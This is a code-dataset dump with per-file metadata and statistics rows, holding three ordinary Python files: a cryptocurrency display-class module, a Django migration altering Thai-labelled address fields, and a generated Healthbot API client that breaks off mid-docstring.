| 41 | 61 | 0.932927 | 25 | 164 | 5.56 | 0.4 | 0.359712 | 0.323741 | 0.388489 | 0.640288 | 0.460432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 164 | 3 | 62 | 54.666667 | 0.879747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b42bc7948240fce681b31a02b2afcd04fd87436e | 18,838 | py | Python | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Crypto currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class EOS(Currency):
"""EOS currency representation.
Simple usage example:
>>> from multicurrency import EOS
>>> eos = EOS(
... amount=123456.789)
>>> print(eos)
ε123,456.7890
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 4,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 4,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EOS':
"""Class creator.
Returns:
EOS: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EOS',
numeric_code='0',
symbol='ε',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ε',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Ethereum(Currency):
"""Ethereum currency representation.
Simple usage example:
>>> from multicurrency import Ethereum
>>> ethereum = Ethereum(
... amount=123456.789)
>>> print(ethereum)
Ξ123,456.789000000000000000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 18,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 18,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Ethereum':
"""Class creator.
Returns:
Ethereum: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ETH',
numeric_code='0',
symbol='Ξ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='Ξ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Bitcoin(Currency):
"""Bitcoin currency representation.
Simple usage example:
>>> from multicurrency import Bitcoin
>>> bitcoin = Bitcoin(
... amount=123456.789)
>>> print(bitcoin)
₿123,456.78900000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 8,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 8,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Bitcoin':
"""Class creator.
Returns:
Bitcoin: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XBT',
numeric_code='0',
symbol='₿',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₿',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class StellarLumens(Currency):
"""Stellar Lumens currency representation.
Simple usage example:
>>> from multicurrency import StellarLumens
>>> stellar_lumens = StellarLumens(
... amount=123456.789)
>>> print(stellar_lumens)
*123,456.7890000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 7,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 7,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'StellarLumens':
"""Class creator.
Returns:
StellarLumens: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XLM',
numeric_code='0',
symbol='*',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='*',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Monero(Currency):
"""Monero currency representation.
Simple usage example:
>>> from multicurrency import Monero
>>> monero = Monero(
... amount=123456.789)
>>> print(monero)
ɱ123,456.789000000000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 12,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 12,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Monero':
"""Class creator.
Returns:
Monero: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XMR',
numeric_code='0',
symbol='ɱ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ɱ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Ripple(Currency):
"""Ripple currency representation.
Simple usage example:
>>> from multicurrency import Ripple
>>> ripple = Ripple(
... amount=123456.789)
>>> print(ripple)
✕123,456.789000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 6,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 6,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Ripple':
"""Class creator.
Returns:
Ripple: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XRP',
numeric_code='0',
symbol='✕',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='✕',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Tezos(Currency):
"""Tezos currency representation.
Simple usage example:
>>> from multicurrency import Tezos
>>> tezos = Tezos(
... amount=123456.789)
>>> print(tezos)
ꜩ123,456.789000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 6,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 6,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Tezos':
"""Class creator.
Returns:
Tezos: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XTZ',
numeric_code='0',
symbol='ꜩ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ꜩ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Zcash(Currency):
"""Zcash currency representation.
Simple usage example:
>>> from multicurrency import Zcash
>>> zcash = Zcash(
... amount=123456.789)
>>> print(zcash)
ⓩ123,456.78900000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 8,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 8,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Zcash':
"""Class creator.
Returns:
Zcash: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ZEC',
numeric_code='0',
symbol='ⓩ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ⓩ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 35.409774 | 77 | 0.587961 | 1,856 | 18,838 | 5.803341 | 0.072737 | 0.051991 | 0.035651 | 0.028224 | 0.878934 | 0.878934 | 0.878934 | 0.878934 | 0.832142 | 0.832142 | 0 | 0.01879 | 0.316329 | 18,838 | 531 | 78 | 35.47646 | 0.816834 | 0.498673 | 0 | 0.792952 | 0 | 0 | 0.013925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035242 | false | 0 | 0.013216 | 0 | 0.154185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b43f5ba18bae1ae48d14d18d6b94da045b4caac5 | 5,017 | py | Python | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | null | null | null | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | 2 | 2020-02-12T00:20:27.000Z | 2020-06-05T18:05:39.000Z | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-22 07:16
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('data', '0002_address_education_insignia_personalinfo_workinfo'),
]
operations = [
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='address',
name='district',
field=models.CharField(max_length=70, verbose_name='อำเภอ(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='district_regis',
field=models.CharField(max_length=70, verbose_name='อำเภอ(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='lane',
field=models.CharField(max_length=40, verbose_name='ซอย(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='lane_regis',
field=models.CharField(max_length=40, verbose_name='ซอย(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='number',
field=models.CharField(max_length=10, verbose_name='เลขที่(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='number_regis',
field=models.CharField(max_length=10, verbose_name='เลขที่(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='phone_number',
field=models.CharField(max_length=20, verbose_name='เบอร์โทรบ้าาน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='phone_number_regis',
field=models.CharField(max_length=20, verbose_name='เบอร์โทรบ้าาน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='postal_code',
field=models.IntegerField(default=0, verbose_name='รหัสไปรษณีย์(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='postal_code_regis',
field=models.IntegerField(default=0, verbose_name='รหัสไปรษณีย์(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='province',
field=models.CharField(max_length=70, verbose_name='จังหวัด(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='province_regis',
field=models.CharField(max_length=70, verbose_name='จังหวัด(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='road',
field=models.CharField(max_length=70, verbose_name='ถนน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='road_regis',
field=models.CharField(max_length=70, verbose_name='ถนน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='smartphone_number',
field=models.CharField(max_length=20, verbose_name='เบอร์มือถือ(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='smartphone_number_regis',
field=models.CharField(max_length=20, verbose_name='เบอร์มือถือ(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='sub_district',
field=models.CharField(max_length=70, verbose_name='ตำบล(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='sub_district_regis',
field=models.CharField(max_length=70, verbose_name='ตำบล(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='village_name',
field=models.CharField(max_length=40, verbose_name='หมู่บ้าน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='village_name_regis',
field=models.CharField(max_length=40, verbose_name='หมู่บ้าน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='village_no',
field=models.IntegerField(default=0, verbose_name='หมู่(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='village_no_regis',
field=models.IntegerField(default=0, verbose_name='หมู่(ตามทะเบียนบ้าน)'),
),
]
| 37.440299 | 121 | 0.581224 | 641 | 5,017 | 4.535101 | 0.168487 | 0.071207 | 0.126591 | 0.158239 | 0.843825 | 0.839009 | 0.839009 | 0.808394 | 0.781562 | 0.675611 | 0 | 0.017203 | 0.281642 | 5,017 | 133 | 122 | 37.721805 | 0.763596 | 0.013554 | 0 | 0.539683 | 1 | 0 | 0.188839 | 0.06389 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.031746 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81ee3a5d95f09c7ead4d6b502cfa16d42c27331d | 39,125 | py | Python | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 10 | 2019-10-23T12:54:37.000Z | 2022-02-07T19:24:30.000Z | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 5 | 2019-09-30T04:29:25.000Z | 2022-02-16T12:21:06.000Z | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 4 | 2019-09-30T01:17:48.000Z | 2020-08-25T07:27:54.000Z | # coding: utf-8
"""
Paragon Insights APIs
API interface for PI application # noqa: E501
OpenAPI spec version: 4.0.0
Contact: healthbot-feedback@juniper.net
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jnpr.healthbot.swagger.api_client import ApiClient
class SystemApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def generate_resource_dependencies(self, **kwargs): # noqa: E501
"""Resource dependencies # noqa: E501
Get resource dependency events. Internal API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_resource_dependencies(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_resource_dependencies_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.generate_resource_dependencies_with_http_info(**kwargs) # noqa: E501
return data
def generate_resource_dependencies_with_http_info(self, **kwargs): # noqa: E501
"""Resource dependencies # noqa: E501
Get resource dependency events. Internal API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_resource_dependencies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_resource_dependencies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/config/rca/generate-resource-dependencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def query_tsdb(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, then query will be executed only for that particular devices in the given device group, else all devices in group will be considered. Given devices will be applicable for all give device-groups. (required)
:param str device: Name of the device. Multiple device should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered (required)
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that needs to be retrieved. Use * for to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.query_tsdb_with_http_info(db, device_group, device, **kwargs) # noqa: E501
else:
(data) = self.query_tsdb_with_http_info(db, device_group, device, **kwargs) # noqa: E501
return data
def query_tsdb_with_http_info(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_with_http_info(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, then query will be executed only for that particular devices in the given device group, else all devices in group will be considered. Given devices will be applicable for all give device-groups. (required)
:param str device: Name of the device. Multiple device should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered (required)
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that needs to be retrieved. Use * for to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['db', 'device_group', 'device', 'measurement', 'topic', 'rule', 'trigger', 'fields', 'order', 'group_by', 'limit', 'where', 'q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tsdb" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'db' is set
if ('db' not in params or
params['db'] is None):
raise ValueError("Missing the required parameter `db` when calling `query_tsdb`") # noqa: E501
# verify the required parameter 'device_group' is set
if ('device_group' not in params or
params['device_group'] is None):
raise ValueError("Missing the required parameter `device_group` when calling `query_tsdb`") # noqa: E501
# verify the required parameter 'device' is set
if ('device' not in params or
params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `query_tsdb`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'db' in params:
query_params.append(('db', params['db'])) # noqa: E501
if 'device_group' in params:
query_params.append(('deviceGroup', params['device_group'])) # noqa: E501
if 'device' in params:
query_params.append(('device', params['device'])) # noqa: E501
if 'measurement' in params:
query_params.append(('measurement', params['measurement'])) # noqa: E501
if 'topic' in params:
query_params.append(('topic', params['topic'])) # noqa: E501
if 'rule' in params:
query_params.append(('rule', params['rule'])) # noqa: E501
if 'trigger' in params:
query_params.append(('trigger', params['trigger'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
if 'group_by' in params:
query_params.append(('groupBy', params['group_by'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'where' in params:
query_params.append(('where', params['where'])) # noqa: E501
if 'q' in params:
query_params.append(('q', params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb/query', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TsdbResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def query_tsdb_post(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_post(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, then query will be executed only for that particular devices in the given device group, else all devices in group will be considered. Given devices will be applicable for all give device-groups. (required)
